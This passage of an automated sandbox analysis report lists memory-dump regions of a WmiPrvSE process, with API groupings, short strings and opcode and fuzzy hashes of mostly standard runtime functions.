                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: FileNameProcess$CloseFindHandleImageOpenPathlstrlen
                                                                • String ID:
                                                                • API String ID: 4193868204-0
                                                                • Opcode ID: ce08c4955bc3595479c1ff8ad2ed921ed68cc80d96d97178f87881ade0f5eed0
                                                                • Instruction ID: e5e4e9e196b3f127d0e0900f12e973f87dc0ff51f9edced1c3cd9a0e60c062fe
                                                                • Opcode Fuzzy Hash: ce08c4955bc3595479c1ff8ad2ed921ed68cc80d96d97178f87881ade0f5eed0
                                                                • Instruction Fuzzy Hash: DC016D39700F5682EB10DB12E8843A966B2FB48FC0F449235DF5B47758DE3CC5568740
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                • String ID:
                                                                • API String ID: 449555515-0
                                                                • Opcode ID: b176ca198d829ca6e6572b04522aece1b0ceee872bb169399538571e8d92b986
                                                                • Instruction ID: 256365f260089578f26dd477e90ede022b8e12b6d71032ee4bae7724535cb890
                                                                • Opcode Fuzzy Hash: b176ca198d829ca6e6572b04522aece1b0ceee872bb169399538571e8d92b986
                                                                • Instruction Fuzzy Hash: 96015E38611F1282EF209B21F8597A572B2AF48B85F045634CB5E0B754EF3DC4688700
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: FinalHandleNamePathlstrlen
                                                                • String ID: \\?\
                                                                • API String ID: 2719912262-4282027825
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: CombinePath
                                                                • String ID: \\.\pipe\
                                                                • API String ID: 3422762182-91387939
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                • String ID: CorExitProcess$mscoree.dll
                                                                • API String ID: 4061214504-1276376045
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: CurrentThread
                                                                • String ID:
                                                                • API String ID: 2882836952-0
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: CurrentThread
                                                                • String ID:
                                                                • API String ID: 2882836952-0
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000003.1588342977.000001F5A9650000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F5A9650000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_3_1f5a9650000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: _set_statfp
                                                                • String ID:
                                                                • API String ID: 1156100317-0
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: _set_statfp
                                                                • String ID:
                                                                • API String ID: 1156100317-0
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000003.1588342977.000001F5A9650000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F5A9650000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_3_1f5a9650000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                • String ID: displacement map'$csm
                                                                • API String ID: 3242871069-816001796
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                • String ID: csm
                                                                • API String ID: 2395640692-1018135373
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000003.1588342977.000001F5A9650000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F5A9650000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_3_1f5a9650000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                • String ID: csm$csm
                                                                • API String ID: 3896166516-3733052814
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                • String ID: csm$csm
                                                                • API String ID: 3896166516-3733052814
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: CallEncodePointerTranslator
                                                                • String ID: MOC$RCC
                                                                • API String ID: 3544855599-2084237596
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: FileNameProcess$CloseFindHandleImageOpenPathlstrlen
                                                                • String ID: pid_
                                                                • API String ID: 4193868204-4147670505
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: FileWrite$ConsoleErrorLastOutput
                                                                • String ID:
                                                                • API String ID: 2718003287-0
                                                                APIs
                                                                • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,000001F5A969250B), ref: 000001F5A969263C
                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,000001F5A969250B), ref: 000001F5A96926C7
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: ConsoleErrorLastMode
                                                                • String ID:
                                                                • API String ID: 953036326-0
                                                                • Opcode ID: 24b43c747a47c1539b5754b5e16eb6c2ca3b5d98313b940494bc4857311e40b3
                                                                • Instruction ID: b61fa151cd522ecd2a98b96efdb93a52986361e37beb46a721c01b168ba250e9
                                                                • Opcode Fuzzy Hash: 24b43c747a47c1539b5754b5e16eb6c2ca3b5d98313b940494bc4857311e40b3
                                                                • Instruction Fuzzy Hash: B191C37A610E6385FB609F6594403FD2BB6BB44B98F146229DF0B6FA95CB34C4A6C700
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: FileType
                                                                • String ID: \\.\pipe\
                                                                • API String ID: 3081899298-91387939
                                                                • Opcode ID: 9f74b3962f733d39baaba749a95c371a470951bb715a297592e83bbb964cef3f
                                                                • Instruction ID: 474ba603c9e14996e09ac1b63b494d0edc9d1fef1f5955337ecdb04097a8ad0e
                                                                • Opcode Fuzzy Hash: 9f74b3962f733d39baaba749a95c371a470951bb715a297592e83bbb964cef3f
                                                                • Instruction Fuzzy Hash: AD71D33A200FA286E735DE2699503F96BB2FBA57C4F44A235DF4B43B89DA34C564C700
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: FileType
                                                                • String ID: \\.\pipe\
                                                                • API String ID: 3081899298-91387939
                                                                • Opcode ID: 714eff9087dd913c6a4ffa065c8bdde7316cfa1c1d020620face2bf4537217c7
                                                                • Instruction ID: 27680913411e95ba867be184a07b7c6b16591a3342df48f16a772b2749457b7e
                                                                • Opcode Fuzzy Hash: 714eff9087dd913c6a4ffa065c8bdde7316cfa1c1d020620face2bf4537217c7
                                                                • Instruction Fuzzy Hash: 5071A13A200FA355EB359A2698443FA6BB2FB997C4F41A236DF0A57B48DE35C525C700
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000003.1588342977.000001F5A9650000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F5A9650000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_3_1f5a9650000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: CallTranslator
                                                                • String ID: MOC$RCC
                                                                • API String ID: 3163161869-2084237596
                                                                • Opcode ID: 576dbeb46c835b0345b09e69c1f2621bfd9d72a62e333468b937aa6fe4b284ec
                                                                • Instruction ID: 3fd9f24765773ae44656241303b610f1b5aaecb7dd94953a04899793e3ed93d1
                                                                • Opcode Fuzzy Hash: 576dbeb46c835b0345b09e69c1f2621bfd9d72a62e333468b937aa6fe4b284ec
                                                                • Instruction Fuzzy Hash: 2B619036504FD581EB609F25E4407EAB7B1FB95B98F446325EB9A07B95CB7CC1A0CB00
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000003.1588342977.000001F5A9650000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F5A9650000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_3_1f5a9650000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: _log10_special
                                                                • String ID: NtDeviceIoControlFile
                                                                • API String ID: 3812965864-1552836012
                                                                • Opcode ID: 42a1b3425ae855bd3dcf8051a52efda2562a7f5b28bf36798d299c0f3618dee7
                                                                • Instruction ID: 2c4ac0c17d9237aad1137042fa54f73014f9a77b7aabc4f997907638dd425853
                                                                • Opcode Fuzzy Hash: 42a1b3425ae855bd3dcf8051a52efda2562a7f5b28bf36798d299c0f3618dee7
                                                                • Instruction Fuzzy Hash: D9614236929FEAC9D7579B359C612B557397F623C5F41A327EB0773A21DB1890234200
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: ErrorFileLastWrite
                                                                • String ID: U
                                                                • API String ID: 442123175-4171548499
                                                                • Opcode ID: 39f3297ad757de2f44d07b29014c700c3c9e9a162aea80241aa030272b5c20f5
                                                                • Instruction ID: f48b7bae11bd5932e93d71026895adf66fe5ef610370a63245c11559ff2f44f1
                                                                • Opcode Fuzzy Hash: 39f3297ad757de2f44d07b29014c700c3c9e9a162aea80241aa030272b5c20f5
                                                                • Instruction Fuzzy Hash: 15419136214A5286DB209F25E4443FA77B2FB98794F815231EF4E8B798EB38C451C740
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: ExceptionFileHeaderRaise
                                                                • String ID: csm
                                                                • API String ID: 2573137834-1018135373
                                                                • Opcode ID: 14621ee37c51e207233f822d95ea19160683cc8cf5c93e678e309839c92fc525
                                                                • Instruction ID: 0ced3d60b46999e9cb3970f0f47bdbbf12c4162bddfa00016b0e3a05aadbed12
                                                                • Opcode Fuzzy Hash: 14621ee37c51e207233f822d95ea19160683cc8cf5c93e678e309839c92fc525
                                                                • Instruction Fuzzy Hash: 8D112E36214F5582EB218B15F4402997BF5FB88B94F589324DB8E07B54DF3CC561CB00
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000003.1588342977.000001F5A9650000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F5A9650000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_3_1f5a9650000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: __std_exception_copy
                                                                • String ID: `vector constructor iterator'$ctor closure'
                                                                • API String ID: 592178966-3792692944
                                                                • Opcode ID: 84cf900fcfb3d3a6fb1bf0d271bc9bb5e5e7286100d614fe8782b049529d09ed
                                                                • Instruction ID: a16e927c6577f40d821bbccec35d6bf36880777fcfd23b3f5c793d21a4fa2765
                                                                • Opcode Fuzzy Hash: 84cf900fcfb3d3a6fb1bf0d271bc9bb5e5e7286100d614fe8782b049529d09ed
                                                                • Instruction Fuzzy Hash: 88E04F65651B9590DF058F62E4512E833A59F59B54B48A2229B5D47311EB28D1F9C300
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000003.1588342977.000001F5A9650000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F5A9650000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_3_1f5a9650000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: __std_exception_copy
                                                                • String ID: ctor closure'$destructor iterator'
                                                                • API String ID: 592178966-595914035
                                                                • Opcode ID: bb5d781f8344c27ab00fab5f843211173fed2689d36f4f0c3b464b4cfa1e33da
                                                                • Instruction ID: a2e39bbb4be2b3f8b186ff1fc620984114812712079da9b0fe23c4a7bb25ded1
                                                                • Opcode Fuzzy Hash: bb5d781f8344c27ab00fab5f843211173fed2689d36f4f0c3b464b4cfa1e33da
                                                                • Instruction Fuzzy Hash: 2AE04665A11B9980DB068F61E4912E83366AB69B58B88A2228B5D4B311EB28D1E8C300
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000003.1588342977.000001F5A9650000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F5A9650000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_3_1f5a9650000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: std::bad_alloc::bad_alloc
                                                                • String ID: `scalar deleting destructor'$essorFeaturePresent
                                                                • API String ID: 1875163511-3386185940
                                                                • Opcode ID: abd9a1d832691902a70f18103a47b6c649109bffa18a88edc7b57f1d0681ce4f
                                                                • Instruction ID: f524460b39419ec2a234739556381339562bbb13eb7b0bb7cee649a1bfa63ae7
                                                                • Opcode Fuzzy Hash: abd9a1d832691902a70f18103a47b6c649109bffa18a88edc7b57f1d0681ce4f
                                                                • Instruction Fuzzy Hash: CAD05E36210ED695EF14EB04D8813E86331FB90308F906232D34E835B1DF38CA6AC340
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: Heap$Process$AllocFree
                                                                • String ID:
                                                                • API String ID: 756756679-0
                                                                • Opcode ID: 49e6f57c350109b6085f77543402dccdd1d3a28d0c40e0a7b35e606b00486c2c
                                                                • Instruction ID: e5c1b7d52507c9733da7ef1235c6f5fcbdedf8b2dc688684ba46b0efdeb3525a
                                                                • Opcode Fuzzy Hash: 49e6f57c350109b6085f77543402dccdd1d3a28d0c40e0a7b35e606b00486c2c
                                                                • Instruction Fuzzy Hash: E2116135611F9281EB04CF6AA4482AD67B2FB89FC4F599234DF4E57725DE38D4528340
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
